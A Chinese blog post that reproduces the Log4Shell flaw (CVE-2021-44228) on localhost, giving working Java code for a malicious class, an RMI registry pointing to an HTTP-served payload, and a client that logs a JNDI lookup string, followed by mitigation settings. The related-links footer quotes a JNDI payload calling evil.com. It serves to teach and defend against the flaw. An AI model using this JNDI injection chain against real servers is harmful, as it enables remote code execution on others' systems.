【核弹级漏洞】Apache Log4j2 漏洞复现(CVE-2021-44228 )包含源码

最新推荐文章于 2024-05-29 12:38:45 发布
最新推荐文章于 2024-05-29 12:38:45 发布
阅读量9.5k 收藏 18
点赞数 2
分类专栏: JAVA 文章标签: 安全 rmi jndi log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37325947/article/details/121884912
版权

2021年12月10日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,漏洞编号:CVE-2021-44228,名称:Log4Shell。由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。关于漏洞的细节想必大家都很感兴趣,我们这边直接用代码来复现漏洞。

目录

实验环境

操作步骤

准备恶意对象

启动HTTP服务器

启动RMI服务器

启动Client

项目代码

漏洞修复

实验环境

java版本 : 1.8.0_91

python版本:  3.10.1  (python版本与此次实验无强关联,只是为了搭建http服务器)

log4j版本 : 2.14.1

实验概览:

此次采用rmi注入,主要有这三个部分。

Client:模拟受攻击的服务器,执行log4j的日志

HTTP服务器:用于上传注入的代码,并返回给Client

RMI服务器:用于接收Client发送的rmi请求,并返回远程对象地址

恶意对象:在这个对象的静态代码块中写入想要执行的代码,如cmd命令。Client在加载对象时,由于默认执行静态代码块,cmd命令也会被执行。

操作步骤

接下来是各部分的代码展示,我们按照启动顺序展开

准备恶意对象

这是对象EviObj的代码,这里为了更好的演示,我们只是简单的执行一个calc命令(windows系统命令),调用计算器。如果大家不是windows的话,自行修改为其他命令。

public class EvilObj {
    static {
        try{
            // open the calc
            Runtime.getRuntime().exec("calc");
        }catch (Exception e){
            e.printStackTrace();
        }

    }

}

准备好代码后,我们编译成class

执行javac EvilObj.java  获得EvilObj.class

启动HTTP服务器

这里为了演示方便,我们直接用python3自带的SimpleHTTPServe来启动,命令如下

python  -m http.server 6666

同时将EvilObj.class放在http服务器的根目录,也就是执行该python命令的所在目录。

启动RMI服务器

这里为了演示方便我rmi服务器也起在本地,监听端口1099,同时返回http服务器的地址为127.0.0.1:6666

代码如下

import com.sun.jndi.rmi.registry.ReferenceWrapper;


import javax.naming.NamingException;

import javax.naming.Reference;

import java.rmi.AlreadyBoundException;

import java.rmi.RemoteException;

import java.rmi.registry.LocateRegistry;

import java.rmi.registry.Registry;

public class RmiServer {

    public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {

        Registry registry = LocateRegistry.createRegistry(1099);

        String url = "http://127.0.0.1:6666/";

        System.out.println("Create RMI registry on port 1099");

        Reference reference = new Reference("EvilObj", "EvilObj", url);

        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);

        registry.bind("evil", referenceWrapper);

    }
}

执行Main方法启动

启动Client

模拟收到攻击,打印恶意日志

import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.LogManager;


public class Main {
    private static final Logger log = LogManager.getLogger();

    public static void main(String[] args) {
        // 执行该日志注入
        log.error("${jndi:rmi://127.0.0.1:1099/evil}");
    }

}

启动后可以看到,成功调用了计算器

项目代码

ApacheLog4j漏洞复现(CVE-2021-44228)包含源码-网络安全文档类资源-CSDN下载

漏洞修复

漏洞修复的方式较多,这里列出一些主要方式,随时会更新。

出现漏洞的log4j版本为 version <= 2.14.1,虽然漏洞一爆出来,log4j官方就发布新版本2.15.0,但是目前还是不停的在出rc版本。截至目前12月14号已经发布到了2.16.0 ,建议升级最新版本搭配以下任意一种方式修复。

1、设置配置参数:

log4j2.formatMsgNoLookups=true

2、修改JVM参数:

-Dlog4j2.formatMsgNoLookups=true

3、修改系统环境变量:

FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true

4、禁止 log4j2 所在服务器外连

5、升级jdk版本至6u211 / 7u201 / 8u191 / 11.0.1以上

Blaze Jack
关注
  • 2
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
2. `apache-log4j-2.12.4-bin.tar.gz`:这是适用于 Java 7 环境的 2.12.4 版本二进制包,包含了针对 CVE-2021-44228 的补丁。 3. `apache-log4j-2.3.2-bin.tar.gz`:这是适用于 Java 6 的 2.3.2 版本二进制包,同样...
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
CVE-2021-44228(log4shell-Quick Guide)
Websec
12-14 859
log4shell - Quick Guide 0x00 Introduction CVE-2021-44228(a.k.a. log4shell) is a Remote Code Execution vulnerability in the Apache Log4j library, a Java-based logging tool widely used in applications around the world. This vulnerability allows an attacke.
Log4j2漏洞复现CVE-2021-44228
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
CVE-2021-44228漏洞复现
最新发布
m0_65764670的博客
05-29 1271
漏洞log4j2漏洞log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
刚刚公布的 Log4J 的史诗安全漏洞 CVE-2021-44228 你处理了吗?
weixin_45987961的博客
12-15 5288
发生什么事了 Log4J 是一个应用非常广泛的Java库,就在前两天的2021年12月10日,Log4J的一个安全漏洞被公布了。那天正好是周五,很多程序员都在计划着怎么度过一个愉快的周末,不料这个安全漏洞的公开,使得全世界很多程序员不得不周末加班,有的甚至通宵达旦紧急应对。 漏洞编号为CVE-2021-44228 ,攻击者利用这个新的零日漏洞,可以远程执行恶意代码。 零日漏洞( zero-day )通常是指还没有补丁的安全漏洞。零日漏洞利用(zero-day exploit)的程序对网络安全具有..
Apache Log4j 2 ​远程代码执行漏洞 ( CVE-2021-44228 )​
itisauto2008的专栏
12-14 2145
Microsoft 继续分析2021 年 12 月 9 日披露的与 Apache Log4j(许多基于 Java 的应用程序中使用的日志记录工具)相关的远程代码执行漏洞( CVE-2021-44228 )​。该漏洞是一种远程代码执行漏洞,可以让未经身份验证的攻击者获得对目标系统的完全访问权限。当易受攻击的 Log4j 2 组件解析和处理特制字符串时,可以触发它。这可能通过任何用户提供的输入发生。 该漏洞编号为CVE-2021-44228,称为“Log4Shell”,影响使用 Log4j 2 版本 2.0.
log4j2漏洞CVE-2021-44228复现笔记(纯步骤过程,没有复杂的知识点)
qq_41132792的博客
05-24 5376
纯粹的一个过程复现,小白向,没有复杂的讲解,按照步骤一步步来就可以成功复现了。
Apache Log4j 2 (apache-log4j-2.17.1-bin.zip)
01-07
Apache Log4j 2 (apache-log4j-2.17.1-bin.zip)是对 Log4j 的升,它比其前身 Log4j 1.x 提供了重大改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。修复了安全漏洞 CVE-...
中国程序员抢先预警「史诗」漏洞,席卷苹果特斯拉
黑马程序员官方博客
12-21 154
2021年11月24日,阿里云安全团队依然像往常一样进行着漏洞的筛查工作。 让人没想到的是,团队成员之一的Chen Zhaojun一铲子下去,就挖出了一个「过去十年来影响最大、最严重的漏洞」——Log4Shell。 借着这个漏洞,攻击者只需要提交一个字符串就能访问对方的服务器,甚至还能在里面上传运行任何代码! 结果就是,12月10号,本来已经在准备过周末的大厂程序员们,都起来通宵加班处理漏洞了。 中国程序员抢先预警「史诗」漏洞,席卷苹果特斯拉 这个漏洞波及了多少大厂呢? 由于Log4j2这个库实在是太受
Apache Log4j2漏洞
四问四不知的博客
12-20 2329
序言 最近又爆出Apache Log4j2的大漏洞(CVE-2021-44228),很多使用了该框架的应用都受到了影响。影响范围极大,攻击者只需要向目标输入一段代码,不需要用户执行任何多余操作即可触发该漏洞,使攻击者可以远程控制受害者服务器。 由于Log4j 是目前全球使用最广泛的Java日志框架之一。该漏洞还影响着很多开源组件,如 Apache Struts2、Apache Solr、Apache Druid、Apache Flink 等。因为该漏洞利用方式简单,一旦有攻击者利用该漏洞,就可以在目标服
Apache Log4j2代码执行漏洞复现cve-2021-44228
Bird&Bird
12-14 9554
目录一、漏洞描述二、影响范围三、漏洞复现1、创建一个maven项目,并导入log4j的依赖包2、编写POC3、编写恶意类4、起http服务5、编译并开启LDAP服务6、运行POC四、反弹shell1、靶场搭建2、访问漏洞环境,环境部署成功3、起RMI和Ldap服务4、开启nc监听5、火狐浏览器进行验证6、反弹shell成功 一、漏洞描述 log4jApache的一个开源项目,是一个基于Java的日志记录框架。Log4j2log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详
分析并复现Apache核弹漏洞,利用Log4j2使目标服务器执行任意代码
我就说我500的博客
12-11 6534
12月9日晚间,ApacheLog4j2被曝光存在严重漏洞,可以随意执行任意远程代码,本贴将详细分析事故原因及实战复现漏洞! 一.事件详情 1.事件经过 2021年12月9日,国内多家机构监测到Apache log4j存在任意代码执行漏洞,并紧急通报相关情况。由于ApacheLog4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。 该漏洞CVSS评分达到了满分10分,影响全球一大半的互联网企业,包括百度、苹果等企业都被爆出存在该漏洞,众多媒体将这个漏洞形容成“史诗”“核.
Log4j核弹漏洞,一行配置修复,速改
猫头虎:授渔优于赠鱼,兴趣引领智慧,探索之乐尤显珍贵。商务合作:Libin9iOak,共赴知识与乐趣的探索之旅!
12-11 3548
紧急!Log4j核弹漏洞;一行配置修复,速改! 周末快乐呀!不过看完这个,你可能就快乐不起来了,说不定还得加个班儿呢! 昨天(周五),一如既往的重复着每天的搬砖日常,突然又收到了公众号【阿里云应急响应】紧急更新通告;为啥说又呢?因为在10个小时之前,已经推送过一次了; 本来以为只是再次提醒一下,仔细一看,发现是在短时间内爆出了连环漏洞;看样子挺严重的,立马放下手中的其他事情,重点关注了一下; 漏洞曝光的主要目的是提醒使用者尽快修复,但同时也让那些不法份子知道了漏洞的存在,所以这种严重漏洞一定要引起
log4j2漏洞复现以及解决方案
学习不止境的博客
08-10 4419
log4j2漏洞解决 rmi远程调用 jndi注入 lookup
Log4j2远程代码执行漏洞CVE-2021-44228
wangzhifei1的博客
01-16 2082
CVE-2021-44228,被广泛称为“Log4Shell”,是一个高危的远程代码执行漏洞,影响了Apache Log4j 2,这是一个在Java应用程序中广泛使用的日志记录库。
获取webshell的十种方法
2301_76786857的博客
03-07 1293
黑客在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。
apache log4j2 任意代码执行漏洞(cve-2021-44228)
09-18
Apache Log4j2是一个广泛使用的开源日志管理工具。...总之,Apache Log4j2CVE-2021-44228漏洞是一个严重的安全威胁,可能导致系统被完全控制。及时升到修复版本、加强监控和审查日志活动是应对该漏洞的关键步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Blaze Jack

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值